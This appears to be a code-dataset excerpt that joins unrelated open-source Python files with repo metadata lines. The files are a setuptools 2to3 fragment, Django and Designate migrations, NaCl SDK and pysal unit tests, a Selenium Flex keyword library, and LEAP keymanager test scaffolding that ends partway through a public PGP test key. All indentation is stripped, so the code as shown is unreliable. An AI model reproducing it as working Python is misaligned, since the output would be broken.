log.info("Fixing " + " ".join(files))
self.__build_fixer_names()
self.__exclude_fixers()
if doctests:
if setuptools.run_2to3_on_doctests:
r = DistutilsRefactoringTool(self.fixer_names)
r.refactor(files, write=True, doctests_only=True)
else:
_Mixin2to3.run_2to3(self, files)
def __build_fixer_names(self):
if self.fixer_names:
return
self.fixer_names = []
for p in setuptools.lib2to3_fixer_packages:
self.fixer_names.extend(get_fixers_from_package(p))
if self.distribution.use_2to3_fixers is not None:
for p in self.distribution.use_2to3_fixers:
self.fixer_names.extend(get_fixers_from_package(p))
def __exclude_fixers(self):
excluded_fixers = getattr(self, 'exclude_fixers', [])
if self.distribution.use_2to3_exclude_fixers is not None:
excluded_fixers.extend(self.distribution.use_2to3_exclude_fixers)
for fixer_name in excluded_fixers:
if fixer_name in self.fixer_names:
self.fixer_names.remove(fixer_name)
| apache-2.0 |
rsubra13/dtc | twitterclone/migrations/0011_auto_20150331_1958.py | 1 | 1815 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('twitterclone', '0010_auto_20150331_1958'),
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('url', models.URLField(max_length=255, blank=True)),
('server', models.CharField(max_length=255, blank=True)),
('farm', models.CharField(max_length=255, blank=True)),
('secret', models.CharField(max_length=255, blank=True)),
('flickrid', models.CharField(max_length=255, blank=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('title', models.CharField(unique=True, max_length=200)),
('message', models.TextField(max_length=1024)),
('created_date', models.DateTimeField()),
('photo_id', models.CharField(max_length=50)),
('tags', models.CharField(max_length=200)),
('userId', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='photo',
name='post',
field=models.ForeignKey(to='twitterclone.Post'),
preserve_default=True,
),
]
| apache-2.0 |
DirtyUnicorns/android_external_chromium_org | native_client_sdk/src/build_tools/tests/sdktools_commands_test.py | 76 | 18779 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
import re
import tarfile
import tempfile
import unittest
from sdktools_test import SdkToolsTestCase
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
BUILD_TOOLS_DIR = os.path.dirname(SCRIPT_DIR)
TOOLS_DIR = os.path.join(os.path.dirname(BUILD_TOOLS_DIR), 'tools')
sys.path.extend([BUILD_TOOLS_DIR, TOOLS_DIR])
import manifest_util
import oshelpers
class TestCommands(SdkToolsTestCase):
def setUp(self):
self.SetupDefault()
def _AddDummyBundle(self, manifest, bundle_name):
bundle = manifest_util.Bundle(bundle_name)
bundle.revision = 1337
bundle.version = 23
bundle.description = bundle_name
bundle.stability = 'beta'
bundle.recommended = 'no'
bundle.repath = bundle_name
archive = self._MakeDummyArchive(bundle_name)
bundle.AddArchive(archive)
manifest.SetBundle(bundle)
# Need to get the bundle from the manifest -- it doesn't use the one we
# gave it.
return manifest.GetBundle(bundle_name)
def _MakeDummyArchive(self, bundle_name, tarname=None, filename='dummy.txt'):
tarname = (tarname or bundle_name) + '.tar.bz2'
temp_dir = tempfile.mkdtemp(prefix='archive')
try:
dummy_path = os.path.join(temp_dir, filename)
with open(dummy_path, 'w') as stream:
stream.write('Dummy stuff for %s' % bundle_name)
# Build the tarfile directly into the server's directory.
tar_path = os.path.join(self.basedir, tarname)
tarstream = tarfile.open(tar_path, 'w:bz2')
try:
tarstream.add(dummy_path, os.path.join(bundle_name, filename))
finally:
tarstream.close()
with open(tar_path, 'rb') as archive_stream:
sha1, size = manifest_util.DownloadAndComputeHash(archive_stream)
archive = manifest_util.Archive(manifest_util.GetHostOS())
archive.url = self.server.GetURL(os.path.basename(tar_path))
archive.size = size
archive.checksum = sha1
return archive
finally:
oshelpers.Remove(['-rf', temp_dir])
def testInfoBasic(self):
"""The info command should display information about the given bundle."""
self._WriteManifest()
output = self._Run(['info', 'sdk_tools'])
# Make sure basic information is there
bundle = self.manifest.GetBundle('sdk_tools')
archive = bundle.GetHostOSArchive();
self.assertTrue(bundle.name in output)
self.assertTrue(bundle.description in output)
self.assertTrue(str(bundle.revision) in output)
self.assertTrue(str(archive.size) in output)
self.assertTrue(archive.checksum in output)
self.assertTrue(bundle.stability in output)
def testInfoUnknownBundle(self):
"""The info command should notify the user of unknown bundles."""
self._WriteManifest()
bogus_bundle = 'foobar'
output = self._Run(['info', bogus_bundle])
self.assertTrue(re.search(r'[uU]nknown', output))
self.assertTrue(bogus_bundle in output)
def testInfoMultipleBundles(self):
"""The info command should support listing multiple bundles."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._AddDummyBundle(self.manifest, 'pepper_24')
self._WriteManifest()
output = self._Run(['info', 'pepper_23', 'pepper_24'])
self.assertTrue('pepper_23' in output)
self.assertTrue('pepper_24' in output)
self.assertFalse(re.search(r'[uU]nknown', output))
def testInfoMultipleArchives(self):
"""The info command should display multiple archives."""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive2 = self._MakeDummyArchive('pepper_26', tarname='pepper_26_more',
filename='dummy2.txt')
archive2.host_os = 'all'
bundle.AddArchive(archive2)
self._WriteManifest()
output = self._Run(['info', 'pepper_26'])
self.assertTrue('pepper_26' in output)
self.assertTrue('pepper_26_more' in output)
def testListBasic(self):
"""The list command should display basic information about remote
bundles."""
self._WriteManifest()
output = self._Run(['list'])
self.assertTrue(re.search('I.*?sdk_tools.*?stable', output, re.MULTILINE))
# This line is important (it's used by the updater to determine if the
# sdk_tools bundle needs to be updated), so let's be explicit.
self.assertTrue('All installed bundles are up-to-date.')
def testListMultiple(self):
"""The list command should display multiple bundles."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['list'])
# Added pepper_23 to the remote manifest not the local manifest, so it
# shouldn't be installed.
self.assertTrue(re.search('^[^I]*pepper_23', output, re.MULTILINE))
self.assertTrue('sdk_tools' in output)
def testListWithRevision(self):
"""The list command should display the revision, if desired."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['list', '-r'])
self.assertTrue(re.search('pepper_23.*?r1337', output))
def testListWithUpdatedRevision(self):
"""The list command should display when there is an update available."""
p23bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
# Modify the remote manifest to have a newer revision.
p23bundle.revision += 1
self._WriteManifest()
output = self._Run(['list', '-r'])
# We should see a display like this: I* pepper_23 (r1337 -> r1338)
# The star indicates the bundle has an update.
self.assertTrue(re.search('I\*\s+pepper_23.*?r1337.*?r1338', output))
def testListLocalVersionNotOnRemote(self):
"""The list command should tell the user if they have a bundle installed
that doesn't exist in the remote manifest."""
self._WriteManifest()
p23bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
output = self._Run(['list', '-r'])
message = 'Bundles installed locally that are not available remotely:'
message_loc = output.find(message)
self.assertNotEqual(message_loc, -1)
# Make sure pepper_23 is listed after the message above.
self.assertTrue('pepper_23' in output[message_loc:])
def testSources(self):
"""The sources command should allow adding/listing/removing of sources.
When a source is added, it will provide an additional set of bundles."""
other_manifest = manifest_util.SDKManifest()
self._AddDummyBundle(other_manifest, 'naclmono_23')
with open(os.path.join(self.basedir, 'source.json'), 'w') as stream:
stream.write(other_manifest.GetDataAsString())
source_json_url = self.server.GetURL('source.json')
self._WriteManifest()
output = self._Run(['sources', '--list'])
self.assertTrue('No external sources installed.' in output)
output = self._Run(['sources', '--add', source_json_url])
output = self._Run(['sources', '--list'])
self.assertTrue(source_json_url in output)
# Should be able to get info about that bundle.
output = self._Run(['info', 'naclmono_23'])
self.assertTrue('Unknown bundle' not in output)
self._Run(['sources', '--remove', source_json_url])
output = self._Run(['sources', '--list'])
self.assertTrue('No external sources installed.' in output)
def testUpdateBasic(self):
"""The update command should install the contents of a bundle to the SDK."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
def testUpdateInCacheButDirectoryRemoved(self):
"""The update command should update if the bundle directory does not exist,
even if the bundle is already in the cache manifest."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteCacheManifest(self.manifest)
self._WriteManifest()
self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
def testUpdateNoNewVersion(self):
"""The update command should do nothing if the bundle is already up-to-date.
"""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
output = self._Run(['update', 'pepper_23'])
self.assertTrue('is already up-to-date.' in output)
def testUpdateWithNewVersion(self):
"""The update command should update to a new version if it exists."""
bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
bundle.revision += 1
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
self.assertTrue('already exists, but has an update available' in output)
# Now update using --force.
output = self._Run(['update', 'pepper_23', '--force'])
self.assertTrue('Updating bundle' in output)
cache_manifest = self._ReadCacheManifest()
num_archives = len(cache_manifest.GetBundle('pepper_23').GetArchives())
self.assertEqual(num_archives, 1)
def testUpdateUnknownBundles(self):
"""The update command should ignore unknown bundles and notify the user."""
self._WriteManifest()
output = self._Run(['update', 'foobar'])
self.assertTrue('unknown bundle' in output)
def testUpdateRecommended(self):
"""The update command should update only recommended bundles when run
without args.
"""
bundle_25 = self._AddDummyBundle(self.manifest, 'pepper_25')
bundle_25.recommended = 'no'
bundle_26 = self._AddDummyBundle(self.manifest, 'pepper_26')
bundle_26.recommended = 'yes'
self._WriteManifest()
output = self._Run(['update'])
# Should not try to update sdk_tools (even though it is recommended)
self.assertTrue('Ignoring manual update request.' not in output)
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_25')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy.txt')))
def testUpdateCanary(self):
"""The update command should create the correct directory name for repath'd
bundles.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
bundle.name = 'pepper_canary'
self._WriteManifest()
output = self._Run(['update', 'pepper_canary'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_canary', 'dummy.txt')))
def testUpdateMultiArchive(self):
"""The update command should include download/untar multiple archives
specified in the bundle.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive2 = self._MakeDummyArchive('pepper_26', tarname='pepper_26_more',
filename='dummy2.txt')
archive2.host_os = 'all'
bundle.AddArchive(archive2)
self._WriteManifest()
output = self._Run(['update', 'pepper_26'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy.txt')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_26', 'dummy2.txt')))
def testUpdateBadSize(self):
"""If an archive has a bad size, print an error.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive = bundle.GetHostOSArchive();
archive.size = -1
self._WriteManifest()
stdout = self._Run(['update', 'pepper_26'], expect_error=True)
self.assertTrue('Size mismatch' in stdout)
def testUpdateBadSHA(self):
"""If an archive has a bad SHA, print an error.
"""
bundle = self._AddDummyBundle(self.manifest, 'pepper_26')
archive = bundle.GetHostOSArchive();
archive.checksum = 0
self._WriteManifest()
stdout = self._Run(['update', 'pepper_26'], expect_error=True)
self.assertTrue('SHA1 checksum mismatch' in stdout)
def testUninstall(self):
"""The uninstall command should remove the installed bundle, if it
exists.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
# Now remove it.
self._Run(['uninstall', 'pepper_23'])
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23')))
# The bundle should not be marked as installed.
output = self._Run(['list'])
self.assertTrue(re.search('^[^I]*pepper_23', output, re.MULTILINE))
def testReinstall(self):
"""The reinstall command should remove, then install, the specified
bundles.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
output = self._Run(['update', 'pepper_23'])
dummy_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# Change some files.
foo_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'foo.txt')
with open(foo_txt, 'w') as f:
f.write('Another dummy file. This one is not part of the bundle.')
with open(dummy_txt, 'w') as f:
f.write('changed dummy.txt')
# Reinstall the bundle.
self._Run(['reinstall', 'pepper_23'])
self.assertFalse(os.path.exists(foo_txt))
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
cache_manifest = self._ReadCacheManifest()
num_archives = len(cache_manifest.GetBundle('pepper_23').GetArchives())
self.assertEqual(num_archives, 1)
def testReinstallWithDuplicatedArchives(self):
"""The reinstall command should only use the most recent archive if there
are duplicated archives.
NOTE: There was a bug where the sdk_cache/naclsdk_manifest2.json file was
duplicating archives from different revisions. Make sure that reinstall
ignores old archives in the bundle.
"""
# First install the bundle.
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
manifest = self._ReadCacheManifest()
bundle = manifest.GetBundle('pepper_23')
self.assertEqual(len(bundle.GetArchives()), 1)
# Now add a bogus duplicate archive
archive2 = self._MakeDummyArchive('pepper_23', tarname='pepper_23',
filename='dummy2.txt')
bundle.AddArchive(archive2)
self._WriteCacheManifest(manifest)
output = self._Run(['reinstall', 'pepper_23'])
# When updating just one file, there is no (file 1/2 - "...") output.
self.assertFalse('file 1/' in output)
# Should be using the last archive.
self.assertFalse(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')))
self.assertTrue(os.path.exists(
os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy2.txt')))
def testReinstallDoesntUpdate(self):
"""The reinstall command should not update a bundle that has an update."""
# First install the bundle.
bundle = self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
dummy_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'dummy.txt')
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# Update the revision.
bundle.revision += 1
self._WriteManifest()
# Change the file.
foo_txt = os.path.join(self.basedir, 'nacl_sdk', 'pepper_23', 'foo.txt')
with open(dummy_txt, 'w') as f:
f.write('changed dummy.txt')
# Reinstall.
self._Run(['reinstall', 'pepper_23'])
# The data has been reinstalled.
self.assertTrue(os.path.exists(dummy_txt))
with open(dummy_txt) as f:
self.assertEqual(f.read(), 'Dummy stuff for pepper_23')
# ... but the version hasn't been updated.
output = self._Run(['list', '-r'])
self.assertTrue(re.search('I\*\s+pepper_23.*?r1337.*?r1338', output))
def testArchiveCacheBasic(self):
"""Downloaded archives should be stored in the cache by default."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
archive_cache = os.path.join(self.cache_dir, 'archives')
cache_contents = os.listdir(archive_cache)
self.assertEqual(cache_contents, ['pepper_23'])
cache_contents = os.listdir(os.path.join(archive_cache, 'pepper_23'))
self.assertEqual(cache_contents, ['pepper_23.tar.bz2'])
def testArchiveCacheEviction(self):
archive_cache = os.path.join(self.cache_dir, 'archives')
self._AddDummyBundle(self.manifest, 'pepper_23')
self._AddDummyBundle(self.manifest, 'pepper_22')
self._WriteManifest()
# First install pepper_23
self._Run(['update', 'pepper_23'])
archive = os.path.join(archive_cache, 'pepper_23', 'pepper_23.tar.bz2')
archive_size = os.path.getsize(archive)
# Set the mtime on the pepper_23 bundle to be a few seconds in the past.
# This is needed so that the two bundles don't end up with the same
# timestamp which can happen on systems that don't report sub-second
# timestamps.
atime = os.path.getatime(archive)
mtime = os.path.getmtime(archive)
os.utime(archive, (atime, mtime-10))
# Set cache limit to size of pepper archive * 1.5
self._WriteConfig('{ "cache_max": %d }' % int(archive_size * 1.5))
# Now install pepper_22, which should cause pepper_23 to be evicted
self._Run(['update', 'pepper_22'])
cache_contents = os.listdir(archive_cache)
self.assertEqual(cache_contents, ['pepper_22'])
def testArchiveCacheZero(self):
"""Archives should not be cached when cache_max is zero."""
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteConfig('{ "cache_max": 0 }')
self._AddDummyBundle(self.manifest, 'pepper_23')
self._WriteManifest()
self._Run(['update', 'pepper_23'])
archive_cache = os.path.join(self.cache_dir, 'archives')
# Archive folder should be completely remove by cache cleanup
self.assertFalse(os.path.exists(archive_cache))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
cneill/designate-testing | designate/storage/impl_sqlalchemy/migrate_repo/versions/043_modify_domains_and_records.py | 8 | 3587 | # Copyright (c) 2014 eBay Inc.
#
# Author: Ron Rickard <rrickard@ebaysf.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, Table, Enum, Column, Integer
from migrate.changeset.constraint import UniqueConstraint
meta = MetaData()
ACTIONS = ['CREATE', 'DELETE', 'UPDATE', 'NONE']
def upgrade(migrate_engine):
meta.bind = migrate_engine
RESOURCE_STATUSES = ['ACTIVE', 'PENDING', 'DELETED', 'ERROR']
# Get associated database tables
domains_table = Table('domains', meta, autoload=True)
records_table = Table('records', meta, autoload=True)
dialect = migrate_engine.url.get_dialect().name
if dialect.startswith("postgresql"):
migrate_engine.execute(
"ALTER TYPE domain_statuses RENAME TO resource_statuses;")
with migrate_engine.connect() as conn:
conn.execution_options(isolation_level="AUTOCOMMIT")
conn.execute(
"ALTER TYPE resource_statuses ADD VALUE 'ERROR' "
"AFTER 'DELETED'")
conn.close()
actions = Enum(name='actions', metadata=meta, *ACTIONS)
actions.create()
resource_statuses = Enum(name='resource_statuses', metadata=meta,
*RESOURCE_STATUSES)
# Upgrade the domains table.
domains_table.c.status.alter(
type=resource_statuses,
default='PENDING', server_default='PENDING')
action_column = Column('action', actions,
default='CREATE', server_default='CREATE',
nullable=False)
action_column.create(domains_table)
# Re-add constraint for sqlite.
if dialect.startswith('sqlite'):
constraint = UniqueConstraint(
'name', 'deleted', name='unique_domain_name', table=domains_table)
constraint.create()
# Upgrade the records table.
if dialect.startswith("postgresql"):
sql = "ALTER TABLE records ALTER COLUMN status DROP DEFAULT, " \
"ALTER COLUMN status TYPE resource_statuses USING " \
"records::text::resource_statuses, ALTER COLUMN status " \
"SET DEFAULT 'PENDING';"
migrate_engine.execute(sql)
record_statuses = Enum(name='record_statuses', metadata=meta,
*RESOURCE_STATUSES)
record_statuses.drop()
else:
records_table.c.status.alter(
type=resource_statuses,
default='PENDING', server_default='PENDING')
action_column = Column('action', actions,
default='CREATE', server_default='CREATE',
nullable=False)
action_column.create(records_table)
serial_column = Column('serial', Integer(), server_default='1',
nullable=False)
serial_column.create(records_table)
# Re-add constraint for sqlite.
if dialect.startswith('sqlite'):
constraint = UniqueConstraint(
'hash', name='unique_record', table=records_table)
constraint.create()
def downgrade(migrate_engine):
pass
| apache-2.0 |
chhao91/pysal | pysal/region/tests/test_maxp.py | 8 | 1754 |
import unittest
import pysal
import numpy as np
import random
class Test_Maxp(unittest.TestCase):
def setUp(self):
random.seed(100)
np.random.seed(100)
def test_Maxp(self):
w = pysal.lat2W(10, 10)
z = np.random.random_sample((w.n, 2))
p = np.ones((w.n, 1), float)
floor = 3
solution = pysal.region.Maxp(
w, z, floor, floor_variable=p, initial=100)
self.assertEquals(solution.p, 29)
self.assertEquals(solution.regions[0], [4, 14, 5, 24, 3])
def test_inference(self):
w = pysal.weights.lat2W(5, 5)
z = np.random.random_sample((w.n, 2))
p = np.ones((w.n, 1), float)
floor = 3
solution = pysal.region.Maxp(
w, z, floor, floor_variable=p, initial=100)
solution.inference(nperm=9)
self.assertAlmostEquals(solution.pvalue, 0.20000000000000001, 10)
def test_cinference(self):
w = pysal.weights.lat2W(5, 5)
z = np.random.random_sample((w.n, 2))
p = np.ones((w.n, 1), float)
floor = 3
solution = pysal.region.Maxp(
w, z, floor, floor_variable=p, initial=100)
solution.cinference(nperm=9, maxiter=100)
self.assertAlmostEquals(solution.cpvalue, 0.10000000000000001, 10)
def test_Maxp_LISA(self):
w = pysal.lat2W(10, 10)
z = np.random.random_sample((w.n, 2))
p = np.ones(w.n)
mpl = pysal.region.Maxp_LISA(w, z, p, floor=3, floor_variable=p)
self.assertEquals(mpl.p, 31)
self.assertEquals(mpl.regions[0], [99, 89, 98])
suite = unittest.TestLoader().loadTestsFromTestCase(Test_Maxp)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite)
| bsd-3-clause |
mebusw/robotframework-selenium2library-flexpilot | src/Selenium2LibraryFlexPilot/keywords/_flashcontroller.py | 1 | 5188 | from robot.libraries.BuiltIn import BuiltIn
# from selenium.webdriver.common.action_chains import ActionChains
class _FlashControllerKeywords:
''' The Locator:
`name:testText*rea/name:U*TextField*`
`window.document.getElementById('loginApp').fp_type({name:'password_field', text:'mode'});`
'''
def __init__(self):
self._flex_app = None
@property
def s2l(self):
return BuiltIn().get_library_instance('Selenium2Library')
_flex_element_locators = ['id=', 'name=', 'automationName=', 'label=',
'text=', 'htmlText=', 'chain=']
_flex_select_locators = ['label=', 'index=', 'text=', 'data=', 'value=']
def select_flex_application(self, dom_locator):
"""Selects Flex application to work with and waits until it is active.
All further Flex keywords will operate on the selected application and
thus you *must always* use this keyword before them. You must also use
this keyword when you want to operate another Flex application.
Because this keyword waits until the selected application is active,
it is recommended to use this if the page where the application is
located is reloaded. The timeout used is the same Selenium timeout that
can be set in `importing` and with `Set Selenium Timeout` keyword.
The application is found using `dom_locator` that must be either `id` or
`name` of the application in HTML. Notice that if you have different
elements for different browsers (<object> vs. <embed>), you need to
use different attributes depending on the browser.
The old dom_locator is returned and can be used to switch back to the
previous application.
Example:
| Select Flex Application | exampleFlexApp |
| Click Flex Element | myButton |
| ${prev app} | = Select Flex Application | secondFlexApp |
| Flex Element Text Should Be | Hello, Flex! |
| Select Flex Application | ${prev app} |
"""
# TODO to find a default flex_obj_id if none
# (this.browserbot.locateElementByXPath('//embed', this.browserbot.getDocument())) ? this.browserbot.locateElementByXPath('//embed', this.browserbot.getDocument()) : this.browserbot.locateElementByXPath('//object', this.browserbot.getDocument()).id
self._flex_app, old = dom_locator, self._flex_app
if dom_locator:
self.s2l.page_should_contain_element(dom_locator)
# It seems that Selenium timeout is used regardless what's given here
# TODO self._selenium.do_command("waitForFlexReady", [dom_locator, self._timeout])
return old
def wait_for_flex_ready(self, dom_locator, timeout=5):
"""Waits until an element is found by `dom_locator` or `timeout` expires.
By detect if a function exists.
"""
self.s2l._info("Waiting %s for element '%s' to appear" % (timeout, dom_locator))
error = "Element '%s' did not appear in <TIMEOUT>" % dom_locator
self.s2l.wait_until_page_contains_element(dom_locator)
self.s2l._wait_until(timeout, error, self._flex_ready, dom_locator)
if None == self._flex_app:
self._flex_app = dom_locator
def _flex_ready(self, dom_locator):
try:
js = "return window.document.getElementById('%s').fp_click" % dom_locator
ret = self.s2l.execute_javascript(js)
except Exception, e:
self.s2l._debug(e)
return False
else:
return None != ret
def click_flex_element(self, locator):
""" Clicks display object.
"""
return self._do_command("fp_click({%s});", locator)
def input_text_into_flex_element(self, locator, text):
"""Types `text` into the display object found by the locator lookup.
"""
return self._do_command("fp_type({%s, text:'%s'});", locator, text)
def flex_element_should_exist(self, locator):
"""assert a display object exists, `locator`
"""
return self._do_command("fp_assertDisplayObject({%s});", locator)
def _do_command(self, command, locator=None, *args):
self.s2l._debug("Executing command '%s' for application '%s' with options '%s'"
% (command, self._flex_app, args))
params = [self._split_flex_locator(locator)]
params.extend(args)
js = self.js_header + (command % tuple(params))
return self.s2l.execute_javascript(js)
def _split_flex_locator(self, locator, prefixes=_flex_element_locators):
selected_prefix = prefixes[0][:-1]
selected_value = locator
for prefix in prefixes:
if locator.startswith(prefix):
selected_prefix, selected_value = locator.split('=')
break
ret = "'%s':'%s'" % (selected_prefix, selected_value)
self.s2l._info(ret)
return ret
@property
def js_header(self):
return "return window.document.getElementById('%s')." % self._flex_app
| apache-2.0 |
kalikaneko/bitmask-dev | tests/integration/keymanager/common.py | 1 | 14100 | # -*- coding: utf-8 -*-
# test_keymanager.py
# Copyright (C) 2013 LEAP
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Base classes for the Key Manager tests.
"""
import distutils.spawn
import os.path
from twisted.internet.defer import gatherResults
from twisted.trial import unittest
from leap.common.testing.basetest import BaseLeapTest
from leap.bitmask.keymanager import KeyManager
from leap.soledad.client import Soledad
PATH = os.path.dirname(os.path.realpath(__file__))
ADDRESS = 'leap@leap.se'
ADDRESS_2 = 'anotheruser@leap.se'
# key 24D18DDF: public key "Leap Test Key <leap@leap.se>"
KEY_FINGERPRINT = "E36E738D69173C13D709E44F2F455E2824D18DDF"
PUBLIC_KEY = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.10 (GNU/Linux)
mQINBFC9+dkBEADNRfwV23TWEoGc/x0wWH1P7PlXt8MnC2Z1kKaKKmfnglVrpOiz
iLWoiU58sfZ0L5vHkzXHXCBf6Eiy/EtUIvdiWAn+yASJ1mk5jZTBKO/WMAHD8wTO
zpMsFmWyg3xc4DkmFa9KQ5EVU0o/nqPeyQxNMQN7px5pPwrJtJFmPxnxm+aDkPYx
irDmz/4DeDNqXliazGJKw7efqBdlwTHkl9Akw2gwy178pmsKwHHEMOBOFFvX61AT
huKqHYmlCGSliwbrJppTG7jc1/ls3itrK+CWTg4txREkSpEVmfcASvw/ZqLbjgfs
d/INMwXnR9U81O8+7LT6yw/ca4ppcFoJD7/XJbkRiML6+bJ4Dakiy6i727BzV17g
wI1zqNvm5rAhtALKfACha6YO43aJzairO4II1wxVHvRDHZn2IuKDDephQ3Ii7/vb
hUOf6XCSmchkAcpKXUOvbxm1yfB1LRa64mMc2RcZxf4mW7KQkulBsdV5QG2276lv
U2UUy2IutXcGP5nXC+f6sJJGJeEToKJ57yiO/VWJFjKN8SvP+7AYsQSqINUuEf6H
T5gCPCraGMkTUTPXrREvu7NOohU78q6zZNaL3GW8ai7eSeANSuQ8Vzffx7Wd8Y7i
Pw9sYj0SMFs1UgjbuL6pO5ueHh+qyumbtAq2K0Bci0kqOcU4E9fNtdiovQARAQAB
tBxMZWFwIFRlc3QgS2V5IDxsZWFwQGxlYXAuc2U+iQI3BBMBCAAhBQJQvfnZAhsD
BQsJCAcDBRUKCQgLBRYCAwEAAh4BAheAAAoJEC9FXigk0Y3fT7EQAKH3IuRniOpb
T/DDIgwwjz3oxB/W0DDMyPXowlhSOuM0rgGfntBpBb3boezEXwL86NPQxNGGruF5
hkmecSiuPSvOmQlqlS95NGQp6hNG0YaKColh+Q5NTspFXCAkFch9oqUje0LdxfSP
QfV9UpeEvGyPmk1I9EJV/YDmZ4+Djge1d7qhVZInz4Rx1NrSyF/Tc2EC0VpjQFsU
Y9Kb2YBBR7ivG6DBc8ty0jJXi7B4WjkFcUEJviQpMF2dCLdonCehYs1PqsN1N7j+
eFjQd+hqVMJgYuSGKjvuAEfClM6MQw7+FmFwMyLgK/Ew/DttHEDCri77SPSkOGSI
txCzhTg6798f6mJr7WcXmHX1w1Vcib5FfZ8vTDFVhz/XgAgArdhPo9V6/1dgSSiB
KPQ/spsco6u5imdOhckERE0lnAYvVT6KE81TKuhF/b23u7x+Wdew6kK0EQhYA7wy
7LmlaNXc7rMBQJ9Z60CJ4JDtatBWZ0kNrt2VfdDHVdqBTOpl0CraNUjWE5YMDasr
K2dF5IX8D3uuYtpZnxqg0KzyLg0tzL0tvOL1C2iudgZUISZNPKbS0z0v+afuAAnx
2pTC3uezbh2Jt8SWTLhll4i0P4Ps5kZ6HQUO56O+/Z1cWovX+mQekYFmERySDR9n
3k1uAwLilJmRmepGmvYbB8HloV8HqwgguQINBFC9+dkBEAC0I/xn1uborMgDvBtf
H0sEhwnXBC849/32zic6udB6/3Efk9nzbSpL3FSOuXITZsZgCHPkKarnoQ2ztMcS
sh1ke1C5gQGms75UVmM/nS+2YI4vY8OX/GC/on2vUyncqdH+bR6xH5hx4NbWpfTs
